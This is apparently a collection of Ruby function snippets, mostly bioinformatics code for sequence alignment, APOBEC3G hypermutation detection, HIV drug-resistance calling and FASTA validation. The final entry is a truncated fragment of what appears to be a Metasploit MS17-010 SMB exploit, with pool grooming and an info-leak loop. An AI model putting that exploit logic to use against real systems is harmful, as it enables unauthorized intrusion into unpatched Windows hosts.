"def align_local(protein)\n # Vytvoreni tabulky\n x = protein.sequence.size\n y = @genome.sequence.size\n tab = Array.new(x+1) { Array.new(y+1) }\n\n # Vyplnime prvni radek a sloupec\n for i in 0..x\n tab[i][0] = 0\n end\n for j in 0..y\n tab[0][j] = 0\n end\n\n for i in 1..x\n for j in 1..y\n match = tab[i-1][j-1] + match(i, j, protein)\n delete = tab[i-1][j] + @@d\n insert = tab[i][j-1] + @@d\n\n tab[i][j] = [match, delete, insert, 0].max\n end\n end\n\n @table = tab\n value = 0\n @lok_max_coordinates = [0,0]\n for i in 1..x\n for j in 1..y\n if tab[i][j] >= value\n value = tab[i][j]\n @lok_max_coordinates = [i, j]\n end\n end\n end\n EvaluatedProtein.new(protein, value)\n end",
"def test_project_from_assembly_to_contigs_with_strand_and_ending_in_gaps\n # This chromosomal region is covered by 2 contigs and 2 gaps at the end: GaCoGaCoGa\n assert_equal(5, @target_slices_contigs_with_strand_ends_in_gaps.length)\n assert_equal(Gap, @target_slices_contigs_with_strand_ends_in_gaps[0].class)\n assert_equal('contig:Btau_4.0:AAFC03028970:1:17365:1', @target_slices_contigs_with_strand_ends_in_gaps[1].display_name)\n assert_equal(Gap, @target_slices_contigs_with_strand_ends_in_gaps[2].class)\n assert_equal('contig:Btau_4.0:AAFC03028962:1:5704:1', @target_slices_contigs_with_strand_ends_in_gaps[3].display_name)\n assert_equal(Gap, @target_slices_contigs_with_strand_ends_in_gaps[4].class)\n end",
"def a3g_hypermut(ref = nil)\n # mut_hash number of apobec3g/f mutations per sequence\n mut_hash = {}\n hm_hash = {}\n out_hash = {}\n\n # total G->A mutations at apobec3g/f positions.\n total = 0\n\n unless ref \n # make consensus sequence for the input sequence hash\n ref = self.consensus\n end\n\n # obtain apobec3g positions and control positions\n apobec = apobec3gf(ref)\n mut = apobec[0]\n control = apobec[1]\n\n self.dna_hash.each do |k,v|\n a = 0 # muts\n b = 0 # potential mut sites\n c = 0 # control muts\n d = 0 # potenrial controls\n mut.each do |n|\n if v[n] == \"A\"\n a += 1\n b += 1\n else\n b += 1\n end\n end\n mut_hash[k] = a\n total += a\n\n control.each do |n|\n if v[n] == \"A\"\n c += 1\n d += 1\n else\n d += 1\n end\n end\n rr = (a/b.to_f)/(c/d.to_f)\n\n t1 = b - a\n t2 = d - c\n\n fet = ViralSeq::Rubystats::FishersExactTest.new\n fisher = fet.calculate(t1,t2,a,c)\n perc = fisher[:twotail]\n info = [k, a, b, c, d, rr.round(2), perc]\n out_hash[k] = info\n if perc < 0.05\n hm_hash[k] = info\n end\n end\n\n if self.dna_hash.size > 200\n rate = total.to_f/(self.dna_hash.size)\n count_mut = mut_hash.values.count_freq\n maxi_count = count_mut.values.max\n poisson_hash = ViralSeq::Math::PoissonDist.new(rate,maxi_count).poisson_hash\n cut_off = 0\n poisson_hash.each do |k,v|\n cal = self.dna_hash.size * v\n obs = count_mut[k]\n if obs >= 20 * cal\n cut_off = k\n break\n elsif k == maxi_count\n cut_off = maxi_count\n end\n end\n mut_hash.each do |k,v|\n if v > cut_off\n hm_hash[k] = out_hash[k]\n end\n end\n end\n\n hm_seq_hash = ViralSeq::SeqHash.new\n hm_hash.each do |k,_v|\n hm_seq_hash.dna_hash[k] = self.dna_hash[k]\n end\n \n hm_seq_hash.title = self.title + \"_hypermut\"\n hm_seq_hash.file = self.file\n filtered_seq_hash = self.sub(self.dna_hash.keys - hm_hash.keys)\n return { a3g_seq: hm_seq_hash,\n filtered_seq: filtered_seq_hash,\n stats: hm_hash.values\n }\n end",
"def prepare_anchorpairs(input_file, anchor_length, sequencing_type, output_file)\t\n\t\tname, mate, seq, quality = nil, nil, nil\n\t\tcounter = -1\n\n\t\tFile.open(output_file, 'w') do |output| \n\t\t\tFile.open(input_file, 'r').readlines.each do |line|\n\t\t\t\tcounter += 1\n\t\t\t\tline = line.strip\n\t\t\t\n\t\t\t\tif counter % 4 == 0 \n\t\t\t\t\tif sequencing_type == 'se'\n\t\t\t\t\t\tname, mate = line.strip, 1\n\t\t\t\t\telse\n\t\t\t\t\t\tname, mate = line.strip.split('/')\n\t\t\t\t\tend\n\t\t\t\telsif counter % 4 == 1\n\t\t\t\t\tseq = line\n\t\t\t\t\n\t\t\t\telsif counter % 4 == 3\n\t\t\t\t\tquality = line\n\t\t\t\n\t\t\t\t\tname_A = \"#{name}_#{mate}_#{seq}_A\"\n\t\t\t\t\tname_B = \"#{name}_#{mate}_#{seq}_B\"\n\t\t\t\n\t\t\t\t\tseq_A = seq[0..anchor_length - 1]\n\t\t\t\t\tseq_B = seq[-anchor_length..-1]\n\t\n\t\t\t\t\tquality_A = quality[0..anchor_length - 1]\n\t\t\t\t\tquality_B = quality[-anchor_length..-1]\n\t\t\t\n\t\t\t\t\toutput.puts [name_A, seq_A, '+', quality_A, name_B, seq_B, '+', quality_B].join(\"\\n\")\n\t\t\t\t\n\t\t\t\t\tname, mate, seq, quality = nil, nil, nil\n\t\t\t\t\tcounter = -1\n\t\t\t\tend \n\t\t\tend\n\t\tend\n\t\t$logfile.puts \"#{Time.new.strftime(\"%c\")}: Anchor preparation succeded.\"\t\n\tend",
"def validation_submission(params)\n\n possible_errors = Array.new\n\n aa_seq_array = is_sequence_empty(params[:aa_sequence], params[:aa_fasta])\n puts \"aa_seq_array => #{aa_seq_array}\"\n # if user submit more than 20 sequence at time, return error immediately\n if !aa_seq_array.nil? and aa_seq_array.length > 20\n possible_errors << \"You submitted more than 20 amino acid sequences. While, we only accept 20 amino acid sequences or less per submission.\"\n return possible_errors\n end\n\n nt_seq_array = is_sequence_empty(params[:nt_sequence], params[:nt_fasta])\n puts \"nt_seq_array => #{nt_seq_array}\"\n if !nt_seq_array.nil? and nt_seq_array.length > 20\n possible_errors << \"You submitted more than 20 nucleotide sequences. While, we only accept 20 nucleotide sequences or less per submission.\"\n return possible_errors\n end\n\n\n if aa_seq_array.nil? or nt_seq_array.nil?\n possible_errors << \"Either your amino acid sequence or nucleotide sequence are empty\"\n return possible_errors\n end\n\n # Check aa sequence \n aa_sequence_hash = Hash.new\n header_array = Array.new\n accession_no_array = Array.new\n invalid_definition = \"\"\n invalid_sequence = \"\"\n aa_seq_array.each do |fasta_sequence|\n query = Bio::FastaFormat.new( fasta_sequence )\n aa_sequence_definition = parse_definition(query.definition)\n\n aa_sequence = validate_seq(query.to_seq.seq,\"aa\") # fail return nil; success return 0\n # puts \"validation aa_sequence => #{aa_sequence}\"\n if aa_sequence_definition.nil?\n invalid_definition += \"#{query.definition}\\n\"\n end\n\n if aa_sequence.nil?\n invalid_sequence += \"#{query.definition}\\n\"\n end\n\n if !aa_sequence_definition.nil? and !aa_sequence.nil?\n aa_sequence_hash[aa_sequence_definition[0]] = query.to_seq.seq\n\n header_array << aa_sequence_definition[0].strip\n accession_no_array << aa_sequence_definition[1].strip\n end\n \n end\n \n if invalid_definition.length > 0 or invalid_sequence.length > 0\n # something wrong with aa sequence field\n invalid_submission_msg = \"Your following amino acid sequences are not following our submission rules\\n\"\n if invalid_definition.length > 0\n invalid_submission_msg += \"Failed fasta format:\\n #{invalid_definition}\"\n end\n if invalid_sequence.length > 0\n invalid_submission_msg += \"Failed amino acid sequence:\\n #{invalid_sequence}\"\n end\n\n possible_errors << invalid_submission_msg\n\n return possible_errors\n\n end\n\n # check uniqueness of header\n duplicate_header = check_uniqueness_of_header(header_array)\n if duplicate_header.length != 0\n invalid_submission_msg = \"Your following amino acid sequences have duplicate header:\\n\"\n duplicate_header.each do |d_header|\n invalid_submission_msg += \"#{d_header}\\n\"\n end\n\n possible_errors << invalid_submission_msg\n \n return possible_errors\n end\n\n # check if the accession number is validate or not\n # we only check the correctness of aa accession number; not gene; since we only care one accession number\n invalid_accession_num = validate_accession_numbers(accession_no_array, \"aa\")\n if invalid_accession_num.length != 0\n invalid_submission_msg = \"Your following amino acid sequences have invalid accession number from NCBI. 
Please check NCBI protein database:<br>\"\n invalid_accession_num.each do |accession_no|\n invalid_submission_msg += \"#{accession_no}<br>\"\n end\n\n possible_errors << invalid_submission_msg\n \n return possible_errors\n end\n\n ########################################################################################\n # Check nt sequence\n nt_sequence_hash = Hash.new\n header_array = Array.new\n accession_no_array = Array.new\n invalid_definition = \"\"\n invalid_sequence = \"\"\n nt_seq_array.each do |fasta_sequence|\n query = Bio::FastaFormat.new( fasta_sequence )\n nt_sequence_definition = parse_definition(query.definition)\n nt_sequence = validate_seq(query.to_seq.seq,\"nt\")\n \n # puts \"validation nt_sequence => #{nt_sequence}\"\n if nt_sequence_definition.nil?\n invalid_definition += \"#{query.definition}\\n\"\n end\n\n if nt_sequence.nil?\n invalid_sequence += \"#{query.definition}\\n\"\n end\n\n if !nt_sequence_definition.nil? and !nt_sequence.nil?\n nt_sequence_hash[nt_sequence_definition[0]] = query.to_seq.seq\n\n header_array << nt_sequence_definition[0].strip\n accession_no_array << nt_sequence_definition[1].strip\n end\n end\n\n if invalid_definition.length > 0 or invalid_sequence.length > 0\n # something wrong with aa sequence field\n invalid_submission_msg = \"Your following nucleotide sequences are not following our submission rules\"\n if invalid_definition.length > 0\n invalid_submission_msg += \"Failed fasta format:\\n #{invalid_definition}\"\n end\n if invalid_sequence.length > 0\n invalid_submission_msg += \"Failed nucleotide sequence:\\n #{invalid_sequence}\"\n end\n\n possible_errors << invalid_submission_msg\n return possible_errors\n end\n \n duplicate_header = check_uniqueness_of_header(header_array)\n if duplicate_header.length != 0\n invalid_submission_msg = \"Your following nucleotide sequences have duplicate header:\\n\"\n duplicate_header.each do |d_header|\n invalid_submission_msg += \"#{d_header}\\n\"\n end\n \n possible_errors << invalid_submission_msg\n \n return possible_errors\n end\n\n invalid_accession_num = validate_accession_numbers(accession_no_array, \"nt\")\n if invalid_accession_num.length != 0\n invalid_submission_msg = \"Your following nucleotide sequences have invalid accession number from NCBI. 
Please check NCBI protein database:<br>\"\n invalid_accession_num.each do |accession_no|\n invalid_submission_msg += \"#{accession_no}<br>\"\n end\n\n possible_errors << invalid_submission_msg\n \n return possible_errors\n end\n\n\n\n # check missing sequence\n missing_aa_sequence, missing_nt_sequence = check_matchness(aa_sequence_hash,nt_sequence_hash)\n # puts \"missing_aa_sequence => #{missing_aa_sequence}\"\n # puts \"missing_nt_sequence => #{missing_nt_sequence}\"\n missing_seq_string = \"\"\n if missing_aa_sequence.length > 0\n missing_seq_string += \"You are missing following amino acid sequence based on your nucleotide sequence:\\n\"\n missing_aa_sequence.each do |aa_seq_name|\n missing_seq_string += \"#{aa_seq_name}\\n\"\n end\n end\n\n if missing_nt_sequence.length > 0\n missing_seq_string += \"You are missing following nucleotide sequence based on your amino acid sequence:\\n\"\n missing_nt_sequence.each do |nt_seq_name|\n missing_seq_string += \"#{nt_seq_name}\\n\"\n end\n end\n\n if missing_seq_string.length > 0\n possible_errors << missing_seq_string\n end\n\n\n\n # if error, return error\n # else, return aa_array and nt_array \n if possible_errors.length > 0\n return possible_errors\n else\n aa_nt_array = Hash.new\n aa_nt_array[\"aa\"] = aa_seq_array\n aa_nt_array[\"nt\"] = nt_seq_array\n return aa_nt_array\n end\n\n end",
"def align_global(protein)\n # Vytvoreni tabulky\n x = protein.sequence.size\n y = @genome.sequence.size\n tab = Array.new(x+1) { Array.new(y+1) }\n\n # Vyplnime prvni radek a sloupec\n for i in 0..x\n tab[i][0] = @@d * i\n end\n for j in 0..y\n tab[0][j] = @@d * j\n end\n\n for i in 1..x\n for j in 1..y\n match = tab[i-1][j-1] + match(i, j, protein)\n delete = tab[i-1][j] + @@d\n insert = tab[i][j-1] + @@d\n\n tab[i][j] = [match, delete, insert].max\n end\n end\n\n @table = tab\n value = tab[x][y]\n EvaluatedProtein.new(protein, value)\n end",
"def update_total_matches\n self.correct_matches = (maker.code.select.with_index { |v, i| v == breaker.guess[i] }).length\n self.matches = 4 - (maker.code - breaker.guess).length - correct_matches\n end",
"def prepare_anchorpairs(input_file, anchor_length, sequencing_type, output_file)\t\n\t\tname, mate, seq, quality = nil, nil, nil\n\t\tcounter = -1\n\n\t\tFile.open(output_file, 'w') do |output| \n\t\t\tFile.open(input_file, 'r').readlines.each do |line|\n\t\t\t\tcounter += 1\n\t\t\t\tline = line.strip\n\t\t\t\n\t\t\t\tif counter % 4 == 0 \n\t\t\t\t\tif sequencing_type == 'se'\n\t\t\t\t\t\tname, mate = line.strip, 1\n\t\t\t\t\telse\n\t\t\t\t\t\tname, mate = line.strip.split('/')\n\t\t\t\t\tend\n\t\t\t\telsif counter % 4 == 1\n\t\t\t\t\tseq = line\n\t\t\t\t\n\t\t\t\telsif counter % 4 == 3\n\t\t\t\t\tquality = line\n\t\t\t\n\t\t\t\t\tname_A = \"#{name}_#{mate}_#{seq}_A\"\n\t\t\t\t\tname_B = \"#{name}_#{mate}_#{seq}_B\"\n\t\t\t\n\t\t\t\t\tseq_A = seq[0..anchor_length - 1]\n\t\t\t\t\tseq_B = seq[-anchor_length..-1]\n\t\n\t\t\t\t\tquality_A = quality[0..anchor_length - 1]\n\t\t\t\t\tquality_B = quality[-anchor_length..-1]\n\t\t\t\n\t\t\t\t\toutput.puts [name_A, seq_A, '+', quality_A, name_B, seq_B, '+', quality_B].join(\"\\n\")\n\t\t\t\t\n\t\t\t\t\tname, mate, seq, quality = nil, nil, nil\n\t\t\t\t\tcounter = -1\n\t\t\t\tend \n\t\t\tend\n\t\tend\n\t\t$logfile.puts \"#{Time.new.strftime(\"%c\")}: Anchor preparation finished.\"\t\n\tend",
"def align!\n # -> uncomment the next line to manually enable rule tracing\n # trace_in( __method__, 32 )\n\n type = ALIGN\n channel = ANTLR3::DEFAULT_CHANNEL\n\n \n # - - - - main rule block - - - -\n # at line 362:8: 'align'\n match( \"align\" )\n\n \n @state.type = type\n @state.channel = channel\n\n ensure\n # -> uncomment the next line to manually enable rule tracing\n # trace_out( __method__, 32 )\n\n end",
"def predation matchTimes\n\t\tmatchTimes.times do |t| \n\t\t\tif @arrayChromosomes.size < 2\n\t\t\t\tbreak\n\t\t\tend\n\t\t\tpos1=rand(@arrayChromosomes.size)\n\t\t\tpos2=rand(@arrayChromosomes.size)\n\t\t\t\n\t\t\twhile pos1 == pos2 do\n\t\t\t\tpos2=rand(@arrayChromosomes.size)\n\t\t\tend\n\t\t\t\n\t\t\tchromosome1=@arrayChromosomes[pos1]\n\t\t\tchromosome2=@arrayChromosomes[pos2]\n\t\t\tchromosome1.fitness=@@predationMatrix[chromosome1.decision][chromosome2.decision][0]\n\t\t\tchromosome2.fitness=@@predationMatrix[chromosome1.decision][chromosome2.decision][1]\n\t\t\t\n\t\t\tif chromosome1.fitness > chromosome2.fitness\n\t\t\t\t@arrayChromosomes.delete_at pos2\n\t\t\telsif chromosome1.fitness < chromosome2.fitness\n\t\t\t\t@arrayChromosomes.delete_at pos1\n\t\t\telsif chromosome1.fitness == @@predationMatrix[1][1][1]\n\t\t\t\tif not @@killTwoSelfish ###MATAR UNO ALEATORIO\n\t\t\t\t\t@arrayChromosomes.delete_at (rand(2)==0)? pos1 : pos2\n\t\t\t\telse ###MATAR LOS DOS\n\t\t\t\t\t@arrayChromosomes.delete_at pos1\n\t\t\t\t\tif pos1 < pos2\n\t\t\t\t\t\tpos2-=1\n\t\t\t\t\tend\n\t\t\t\t\t@arrayChromosomes.delete_at pos2\n\t\t\t\tend\n\t\t\tend\n\t\t\t\n\t\tend\n\tend",
"def query_align(seqs)\n seqtype = nil\n unless seqs.is_a?(Bio::Alignment)\n seqs = Bio::Alignment.new(seqs)\n end\n seqs.each do |s|\n if s.is_a?(Bio::Sequence::AA) then\n seqtype = 'PROTEIN'\n elsif s.is_a?(Bio::Sequence::NA) then\n seqtype = 'DNA'\n end\n break if seqtype\n end\n query_string(seqs.to_fasta(70, :avoid_same_name => true), seqtype)\n end",
"def align_compressed_reads_to_human_genome_reference_using_bowtie\n\t\tputs \"step 7 align compressed reads to human genome reference using bowtie\"\n\t\tfiles.each_pair do |k,v|\n\t\t\t#\tbowtie's verbose is RIDICULOUS!\n\t\t\t#\tIt prints WAY too much and adds WAY too much time.\n\t\t\t#\t\t\t\t\"--verbose \"<<\n\t\t\tcommand = \"bowtie -n #{bowtie_mismatch} -p #{bowtie_threads} -f \" <<\n\t\t\t\t\"-S #{bowtie_index_human} compress_#{k}lane.fa compress_#{k}lane.sam\"\n\t\t\tcommand.execute\n\t\t\t\"compress_#{k}lane.sam\".file_check(die_on_failed_file_check) #\tthe reads that DIDN'T align?\tNO\n\n\t\t\t\"sam2names.rb compress_#{k}lane.sam bowtie_#{k}lane.names\".execute\n\t\t\t\"bowtie_#{k}lane.names\".file_check(die_on_failed_file_check)\n\t\tend\n\n\t\tpull_reads_from_fastas(\n\t\t\tfiles.keys.sort.collect{|k| \"bowtie_#{k}lane.names\" },\n\t\t\tfiles.keys.sort.collect{|k| \"compress_#{k}lane.fa\" },\n\t\t\tfiles.keys.sort.collect{|k| \"bowtie_#{k}lane.fa\" })\n\n#\n#\tThis script has fixed input of chopped_leftlane.psl (and right or single)\n#\tBAD. BAD. BAD.\tTODO\n#\tThis is only informative and nothing uses the output\n#\tso could be commented out.\n#\n#\n#\tTODO Replaced with ruby version, but still in development\n#\n#\n#\t\tcommand = \"candidate_non_human.rb \"\n#\t\t#\tfiles is a hash and the keys are not guaranteed to be sorted\n#\t\t#\tsort alphabetically and left is first, right is last (conveniently)\n#\t\tfiles.keys.sort.each{|k| command << \"bowtie_#{k}lane.names \" }\n#\t\tcommand.execute\n#\t\tfile_check( \"candidate_non_human.txt\" )\n\tend",
"def sdrm_rt_bulk(sequences, cutoff = 0, temp_r_dir = File.dirname($0))\n region = \"RT\"\n rf_label = 1\n start_codon_number = 34\n gap = \"AGACTTCAGGAAGTATACTGCATTTACCATACCTAGTATAAACAATGAGACACCAGGGATTAGATATCAGTACAATGTGCTTCCAC\"\n\n n_seq = sequences.size\n mut_nrti = {}\n mut_nnrti = {}\n mut_com = []\n r1_aa = {}\n r2_aa = {}\n point_mutation_list = []\n sequences.each do |name,seq|\n r1 = seq[0,267]\n r2 = seq[267..-1]\n seq = r1 + gap + r2\n s = Sequence.new(name,seq)\n s.get_aa_array(rf_label)\n aa_seq = s.aa_array\n\n r1_aa[name] = aa_seq[0,89].join(\"\")\n r2_aa[name] = aa_seq[-85..-1].join(\"\")\n nrti = sdrm_nrti(aa_seq,start_codon_number)\n nnrti = sdrm_nnrti(aa_seq,start_codon_number)\n mut_com << (nrti.merge(nnrti))\n\n nrti.each do |position,mutation|\n if mut_nrti[position]\n mut_nrti[position][1] << mutation[1]\n else\n mut_nrti[position] = [mutation[0],[]]\n mut_nrti[position][1] << mutation[1]\n end\n end\n nnrti.each do |position,mutation|\n if mut_nnrti[position]\n mut_nnrti[position][1] << mutation[1]\n else\n mut_nnrti[position] = [mutation[0],[]]\n mut_nnrti[position][1] << mutation[1]\n end\n end\n end\n\n mut_nrti.each do |position,mutation|\n wt = mutation[0]\n mut_list = mutation[1]\n count_mut_list = count(mut_list)\n count_mut_list.each do |m,number|\n ci = r_binom_CI(number, n_seq, temp_r_dir)\n label = number < cutoff ? \"*\" : \"\"\n point_mutation_list << [\"NRTI\", n_seq, position, wt, m, number, (number/n_seq.to_f).round(5), ci[0], ci[1], label]\n end\n end\n\n mut_nnrti.each do |position,mutation|\n wt = mutation[0]\n mut_list = mutation[1]\n count_mut_list = count(mut_list)\n count_mut_list.each do |m,number|\n ci = r_binom_CI(number, n_seq, temp_r_dir)\n label = number < cutoff ? \"*\" : \"\"\n point_mutation_list << [\"NNRTI\", n_seq, position, wt, m, number, (number/n_seq.to_f).round(5), ci[0], ci[1], label]\n end\n end\n point_mutation_list.sort_by! {|record| record[2]}\n\n link = count(mut_com)\n link2 = {}\n link.each do |k,v|\n pattern = []\n if k.size == 0\n pattern = ['WT']\n else\n k.each do |p,m|\n pattern << (m[0] + p.to_s + m[1])\n end\n end\n link2[pattern.join(\"+\")] = v\n end\n linkage_list = []\n link2.sort_by{|_key,value|value}.reverse.to_h.each do |k,v|\n ci = r_binom_CI(v, n_seq, temp_r_dir)\n label = v < cutoff ? \"*\" : \"\"\n linkage_list << [region, n_seq, k, v, (v/n_seq.to_f).round(5), ci[0], ci[1], label]\n end\n\n report_list = []\n\n div_aa = {}\n r1_aa_start = 34\n r2_aa_start = 152\n\n r1_aa_size = r1_aa.values[0].size - 1\n r2_aa_size = r2_aa.values[0].size - 1\n\n (0..r1_aa_size).to_a.each do |p|\n aas = []\n r1_aa.values.each do |r1|\n aas << r1[p]\n end\n count_aas = count(aas)\n div_aa[r1_aa_start] = count_aas.sort_by{|_k,v|v}.reverse.to_h\n r1_aa_start += 1\n end\n\n (0..r2_aa_size).to_a.each do |p|\n aas = []\n r2_aa.values.each do |r1|\n aas << r1[p]\n end\n count_aas = count(aas)\n div_aa[r2_aa_start] = count_aas.sort_by{|k,v|v}.reverse.to_h\n r2_aa_start += 1\n end\n\n div_aa.each do |k,v|\n record = [region, k, n_seq]\n $amino_acid_list.each do |amino_acid|\n aa_count = v[amino_acid]\n record << (aa_count.to_f/n_seq*100).round(4)\n end\n report_list << record\n end\n\n return [point_mutation_list, linkage_list, report_list]\nend",
"def clustal_consensus_multi(seq_hash,open = 15, ext = 6.66, gap_treatment = 1)\n gapopen = open\n gapext = ext\n temp_dir = File.dirname($0)\n temp_file_in = temp_dir + \"/temp_sequence\"\n f = File.open(temp_file_in,'w')\n f.puts seq_hash.flatten\n f.close\n\n temp_file_out = temp_dir + \"/temp_out\"\n temp_screen_out = temp_dir + \"/temp_screen\"\n print `/applications/clustalw2 -infile=#{temp_file_in} -case=upper -outorder=input -output=gde -outfile=#{temp_file_out} >#{temp_screen_out} -gapopen=#{gapopen} -gapext=#{gapext}`\n h = {}\n File.open(temp_file_out,\"r\") do |file|\n n = 0\n file.readlines.each do |line|\n if line =~ /^\\#/\n n += 1\n h[n] = \"\"\n else\n h[n] += line.chomp\n end\n end\n end\n length = h[1].size\n consensus_bases = []\n (0..(length-1)).each do |n|\n bases = []\n h.values.each do |seq|\n bases << seq[n]\n end\n if gap_treatment == 1\n consensus_bases << creat_consensus_base_non_gap(bases)\n else\n consensus_bases << creat_consensus_base_gap(bases)\n end\n end\n File.unlink temp_file_in\n File.unlink temp_file_out\n File.unlink temp_screen_out\n Dir.chdir(temp_dir) do\n Dir.glob(\"*.dnd\") do |dnd|\n File.unlink(dnd)\n end\n end\n consensus_seq = consensus_bases.join('')\nend",
"def brute_force_optimal(tg,faulty,replacements,n)\n if tg[1].size == 0 # special case if there are no edges(all replacements are equal)\n return get_mappings(faulty,replacements)[0] # return the first mapping\n end\n get_mappings(faulty,replacements).min_by do |a|\n euclidean_distance(tg,a,n) \n end\nend",
"def check_alignment_marker\n alignment_marker = find(:item, sample: { name: \"QX Alignment Marker (15bp/5kb)\" })[0]\n marker_in_analyzer = find(:item, object_type: { name: \"Stripwell\" })\n .find { |s| collection_from(s).matrix[0][0] == alignment_marker.sample.id &&\n s.location == \"Fragment analyzer\" }\n marker_needs_replacing = (!marker_in_analyzer.nil? && marker_in_analyzer.get(:begin_date)) ? (Date.today - (Date.parse marker_in_analyzer.get(:begin_date)) >= 7) : true\n alignment_marker_stripwell = find(:item, object_type: { name: \"Stripwell\" })\n .find { |s| collection_from(s).matrix[0][0] == alignment_marker.sample.id &&\n s != marker_in_analyzer }\n if marker_needs_replacing && alignment_marker_stripwell\n \n show do\n title \"Place stripwell #{alignment_marker_stripwell} in buffer array\"\n note \"Move to the fragment analyzer.\"\n note \"Open ScreenGel software.\"\n check \"Click on the \\\"Load Position\\\" icon.\"\n check \"Open the sample door and retrieve the buffer tray.\"\n warning \"Be VERY careful while handling the buffer tray! Buffers can spill.\"\n check \"Discard the current alignment marker stripwell (labeled #{marker_in_analyzer}).\" if marker_in_analyzer\n check \"Place the alignment marker stripwell labeled #{alignment_marker_stripwell} in the MARKER 1 position of the buffer array.\"\n image \"make_marker_placement\"\n check \"Place the buffer tray in the buffer tray holder\"\n image \"make_marker_tray_holder\"\n check \"Close the sample door.\"\n end\n \n alignment_marker_stripwell.location = \"Fragment analyzer\"\n alignment_marker_stripwell.associate :begin_date, Date.today.strftime\n alignment_marker_stripwell.save\n release [alignment_marker_stripwell]\n marker_in_analyzer.mark_as_deleted\n end\n end",
"def traceback(i, j, tn) \n alignment = [\"\", \"\"]\n \n loop do\n t = @ts[tn][1]\n \n # Are we at the end?\n return [alignment] if i == 0 || j == 0\n # If performing a local alignment, has the score dropped below 0?\n return [alignment] if !@align_globally && @ts[tn][0][i][j] <= 0\n \n # Insert as appropriate.\n if t[i][j][0][0] == i - 1\n alignment[0].insert(0, @a[i - 1])\n else\n alignment[0].insert(0, '_')\n end\n if t[i][j][0][1] == j - 1\n alignment[1].insert(0, @b[j - 1])\n else\n alignment[1].insert(0, '_')\n end\n \n # During local alignment, you must implement the following simplification. \n # If you trace back to a cell that contains pointers to a zero in the M \n # matrix and a pointer to a zero in the Ix or Iy matrix, you should only \n # follow the pointer to the zero in the M matrix and terminate your \n # traceback there only. This will prevent you from having alignments \n # that are right-sided substrings.\n \n # If there are multiple possible traceback paths originating in this cell,\n # recurse and follow them individually.\n if t[i][j].size > 1\n # If we are tracing back to a cell with a 0 in the M matrix, we ignore\n # other possible tracebacks.\n if t[i][j].any? {|c| c[2] == :m && @m[c[0]][c[1]] == 0}\n tracebacks = t[i][j].select {|c| c[2] == :m}\n else\n tracebacks = t[i][j]\n end\n \n subalignments = []\n tracebacks.each do |cell|\n traceback(cell[0], cell[1], cell[2]).each do |subalignment|\n subalignments << subalignment\n end\n end\n return subalignments.map do |subalignment|\n [\n subalignment[0] + alignment[0],\n subalignment[1] + alignment[1]\n ]\n end\n end\n \n i, j, tn = t[i][j][0]\n end\n end",
"def a3g_hypermut_seq_hash(seq_hash)\n #mut_hash number of apobec3g/f mutations per sequence\n mut_hash = {}\n hm_hash = {}\n out_hash = {}\n\n #total G->A mutations at apobec3g/f positions.\n total = 0\n\n #make specimen consensus\n ref = consensus_without_alignment(seq_hash.values)\n\n #obtain apobec3g positions and control positions\n apobec = apobec3gf(ref)\n mut = apobec[0]\n control = apobec[1]\n\n seq_hash.each do |k,v|\n a = 0 #muts\n b = 0 #potential mut sites\n c = 0 #control muts\n d = 0 #potenrial controls\n mut.each do |n|\n next if v[n] == \"-\"\n if v[n] == \"A\"\n a += 1\n b += 1\n else\n b += 1\n end\n end\n mut_hash[k] = a\n total += a\n\n control.each do |n|\n next if v[n] == \"-\"\n if v[n] == \"A\"\n c += 1\n d += 1\n else\n d += 1\n end\n end\n rr = (a/b.to_f)/(c/d.to_f)\n\n t1 = b - a\n t2 = d - c\n\n fet = Rubystats::FishersExactTest.new\n fisher = fet.calculate(t1,t2,a,c)\n perc = fisher[:twotail]\n info = k + \",\" + a.to_s + \",\" + b.to_s + \",\" + c.to_s + \",\" + d.to_s + \",\" + rr.round(2).to_s + \",\" + perc.to_s\n out_hash[k] = info\n if perc < 0.05\n hm_hash[k] = info\n end\n end\n\n if seq_hash.size > 20\n rate = total.to_f/(seq_hash.size)\n\n count_mut = count(mut_hash.values)\n maxi_count = count_mut.values.max\n\n poisson_hash = poisson_distribution(rate,maxi_count)\n\n cut_off = 0\n poisson_hash.each do |k,v|\n cal = seq_hash.size * v\n obs = count_mut[k]\n if obs >= 20 * cal\n cut_off = k\n break\n elsif k == maxi_count\n cut_off = maxi_count\n end\n end\n\n mut_hash.each do |k,v|\n if v > cut_off\n hm_hash[k] = out_hash[k]\n end\n end\n end\n\n hm_seq_hash = {}\n hm_hash.keys.each do |k|\n hm_seq_hash[k] = seq_hash[k]\n end\n return [hm_seq_hash,hm_hash]\nend",
"def matches(max_mismatches)\n out = []\n\n (0..text_len-patt_len).each do |i|\n out << i if quasi_match?(i, max_mismatches)\n end\n\n out\n end",
"def exploit_matched_pairs(pipe_handle)\n begin\n leak_frag_size(pipe_handle.file_id)\n rescue TypeError => e\n raise MS17_010_Error, 'TypeError leaking initial Frag size, is the target patched?'\n end\n\n # we have all info for offsets now\n #@ctx = @ctx.merge(OS_ARCH_INFO[@ctx['os']][@ctx['arch']])\n pick_ctx()\n\n # groom: srv buffer header\n @ctx['GROOM_POOL_SIZE'] = calc_alloc_size(GROOM_TRANS_SIZE + @ctx['SRV_BUFHDR_SIZE'] + @ctx['POOL_ALIGN'], @ctx['POOL_ALIGN'])\n\n # groom paramters and data is alignment by 8 because it is NT_TRANS\n @ctx['GROOM_DATA_SIZE'] = GROOM_TRANS_SIZE - TRANS_NAME_LEN - 4 - @ctx['TRANS_SIZE'] # alignment (4)\n\n # bride: srv buffer header, pool header (same as pool align size), empty transaction name (4)\n bridePoolSize = 0x1000 - (@ctx['GROOM_POOL_SIZE'] & 0xfff) - @ctx['FRAG_POOL_SIZE']\n @ctx['BRIDE_TRANS_SIZE'] = bridePoolSize - (@ctx['SRV_BUFHDR_SIZE'] + @ctx['POOL_ALIGN'])\n\n if datastore['DBGTRACE']\n print_status(\"GROOM_POOL_SIZE: 0x#{@ctx['GROOM_POOL_SIZE'].to_s(16)}\")\n print_status(\"BRIDE_TRANS_SIZE: 0x#{@ctx['BRIDE_TRANS_SIZE'].to_s(16)}\")\n end\n\n # bride paramters and data is alignment by 4 because it is TRANS\n @ctx['BRIDE_DATA_SIZE'] = @ctx['BRIDE_TRANS_SIZE'] - TRANS_NAME_LEN - @ctx['TRANS_SIZE']\n\n # ================================\n # try align pagedpool and leak info until satisfy\n # ================================\n for i in 0..datastore['LEAKATTEMPTS']\n reset_extra_multiplex_id()\n\n vprint_status(\"Attempting leak ##{i.to_s}\")\n\n leakInfo = align_transaction_and_leak(pipe_handle)\n\n if leakInfo != nil\n break\n end\n\n vprint_status(\"Align transaction and leak failed, attempt 